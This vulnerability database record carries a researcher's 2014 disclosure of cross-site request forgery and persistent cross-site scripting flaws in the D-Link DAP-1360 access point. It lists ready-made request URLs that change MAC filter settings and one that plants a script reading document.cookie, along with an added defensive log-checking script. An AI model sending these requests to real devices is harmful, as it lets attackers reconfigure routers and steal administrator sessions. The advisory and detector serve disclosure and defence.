ID

VAR-E-201411-0438


TITLE

D-Link DAP-1360 Cross Site Scripting / Cross Site Request Forgery

Trust: 0.5

sources: PACKETSTORM: 129307

DESCRIPTION

The D-Link DAP-1360 suffers from cross site request forgery and cross site scripting vulnerabilities.

Trust: 0.5

sources: PACKETSTORM: 129307

AFFECTED PRODUCTS

vendor: d link | model: dap-1360 | scope: - | version: -

Trust: 0.5

sources: PACKETSTORM: 129307

EXPLOIT

Hello list!

There are Cross-Site Request Forgery and Cross-Site Scripting
vulnerabilities in D-Link DAP-1360 (Wi-Fi Access Point and Router).

-------------------------
Affected products:
-------------------------

The following model is vulnerable: D-Link DAP-1360, Firmware 1.0.0. This model
with other firmware versions must also be vulnerable.

D-Link will fix these vulnerabilities in the next version of the firmware (to
be released in November), as they answered me in October. But in November
they answered me that the firmware still had not been publicly released due to
bugs and that they need to work on it.

I tested model DAP-1360/B/D1B. There are three models of DAP-1360:

DAP-1360/B1A (f/w ver 2.xx) - D-Link will not add fixes, it's EOL device.
DAP-1360/B/D1B (f/w ver 1.x.x - 2.x.x) - D-Link will fix the vulnerabilities
in new firmware, which will be released in November.
DAP-1360/A/E1A (f/w ver 2.5.4 or later) - the first public firmware includes
fixes for the vulnerabilities.

----------
Details:
----------

In section Wi-Fi - MAC filter - Filter mode it's possible to change
parameter MAC filter restrict mode:

Disabled:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:0}]}

Allow:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:1}]}

Deny:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:2}]}

In section Wi-Fi - MAC filter - MAC addresses it's possible to add and
remove MAC addresses:

Add:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=41&res_struct_size=0&res_buf=[%2200:00:00:00:00:00%22]

Remove:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=44&res_struct_size=0&res_buf=[%2200:00:00:00:00:00%22]

XSS (persistent XSS) (WASC-08):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=41&res_struct_size=0&res_buf=[%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22]

Code will execute at http://192.168.0.50/index.cgi#wifi/mac.

------------
Timeline:
------------

2014.05.22 - informed the developer about multiple vulnerabilities.
2014.06.21 - announced new vulnerabilities in DAP-1360 on my site.
2014.11.26 - disclosed on my site (http://websecurity.com.ua/7215/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
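
A defender-side log check for the requests listed in the advisory above, added here as an example that is not part of the original advisory or of D-Link's code. It assumes request URL and Referer pairs are available (for instance from a proxy log), treats a missing or foreign Referer as a heuristic sign of a forged request, and uses hypothetical names (`review_request`, `CONFIG_IDS`, `SAMPLE_LOG`).

```python
import json
import re
from urllib.parse import urlsplit, parse_qs

DEVICE_HOST = "192.168.0.50"  # device address used in the advisory
MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(:[0-9A-Fa-f]{2}){5}$")
# res_config_id values the advisory shows changing settings
CONFIG_IDS = {"40": "MAC filter mode change",
              "41": "MAC address add",
              "44": "MAC address remove"}

def review_request(url, referer=None):
    """Return findings for one logged GET request (hypothetical helper)."""
    parts = urlsplit(url)
    if parts.hostname != DEVICE_HOST or parts.path != "/index.cgi":
        return []
    query = parse_qs(parts.query)
    cfg = query.get("res_config_id", [""])[0]
    if cfg not in CONFIG_IDS:
        return []
    findings = []
    # Assumption: the device's own UI sends a Referer from the device host.
    ref_host = urlsplit(referer).hostname if referer else None
    if ref_host != DEVICE_HOST:
        findings.append(CONFIG_IDS[cfg] + " without same-origin Referer")
    if cfg in ("41", "44"):
        raw = query.get("res_buf", ["[]"])[0]
        try:
            entries = json.loads(raw)
        except ValueError:
            entries = [raw]
        if not isinstance(entries, list):
            entries = [entries]
        # Anything that is not a MAC address has no place in the MAC list.
        if any(not (isinstance(e, str) and MAC_RE.match(e)) for e in entries):
            findings.append("non-MAC value in res_buf")
    return findings

BASE = ("http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json"
        "&res_config_action=3&res_struct_size=0")
# Constructed sample log entries: (request URL, Referer header)
SAMPLE_LOG = [
    (BASE + "&res_config_id=41&res_buf=[%2200:11:22:33:44:55%22]",
     "http://192.168.0.50/index.cgi"),
    (BASE + "&res_config_id=40&res_buf={%22mbssid%22:[{%22AccessPolicy%22:0}]}",
     "http://example.test/page.html"),
    (BASE + "&res_config_id=41&res_buf=[%22%3Cb%3Ex%3C/b%3E%22]", None),
]

if __name__ == "__main__":
    for url, referer in SAMPLE_LOG:
        print(review_request(url, referer) or "ok")
```

The same MAC-format check, applied server-side before the value is stored and paired with output encoding on the MAC filter page, is the corresponding fix for the persistent XSS.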

Trust: 0.5

sources: PACKETSTORM: 129307

EXPLOIT HASH

LOCAL

SOURCE

md5: 27bd4054a49156d0664a0f4a7b85cf4b
sha-1: c980d1ba2a3dff6508cd66f7716ef2d5891e0d7a
sha-256: 55251ecf0633440957d348713dd25ad1aa213796491552bd68d69efa4111b2e0

Trust: 0.5

sources: PACKETSTORM: 129307

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 129307

TYPE

xss, csrf

Trust: 0.5

sources: PACKETSTORM: 129307

TAGS

tag:exploit

Trust: 0.5

tag:vulnerability

Trust: 0.5

tag:xss

Trust: 0.5

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 129307

CREDITS

MustLive

Trust: 0.5

sources: PACKETSTORM: 129307

EXTERNAL IDS

db: PACKETSTORM | id: 129307

Trust: 0.5

sources: PACKETSTORM: 129307

SOURCES

db: PACKETSTORM | id: 129307

LAST UPDATE DATE

2022-07-27T09:58:43.515000+00:00


SOURCES RELEASE DATE

db: PACKETSTORM | id: 129307 | date: 2014-11-28T09:22:22